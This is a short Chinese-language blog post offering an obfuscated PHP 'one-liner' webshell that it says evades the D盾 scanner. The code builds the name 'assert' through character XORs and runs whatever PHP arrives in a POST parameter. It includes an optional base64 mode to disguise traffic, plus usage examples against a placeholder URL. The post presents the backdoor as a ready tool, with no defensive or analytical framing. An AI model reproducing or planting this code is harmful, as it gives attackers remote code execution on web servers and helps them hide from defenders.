免杀PHP一句话
过最新D盾等,webshell变量随机,增加流量传输编码方式
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
class LTDS { public function __destruct() { $bxo='X'^"\x39"; $woa='?'^"\x4c"; $ukt='K'^"\x38"; $gud='d'^"\x1"; $fbu='_'^"\x2d"; $agx='<'^"\x48"; $HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx; return @$HLWV($this->OX); } } $ltds=new LTDS(); @$ltds->OX=isset($_GET['id'])?base64_decode($_POST['ua8']):$_POST['ua8']; |
使用说明
是否传入id参数决定是否把流量编码
1 2 3 4 5 6 |
http://www.xxx.com/shell.php POST: ua8=phpinfo(); //与普通shell相同 http://www.xxx.com/shell.php?id=xxx(xxxx随便修改) POST: ua8=cGhwaW5mbygpOwo= //payload的base64编码 |
原文连接:免杀WebShell PHP一句话,过D盾
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。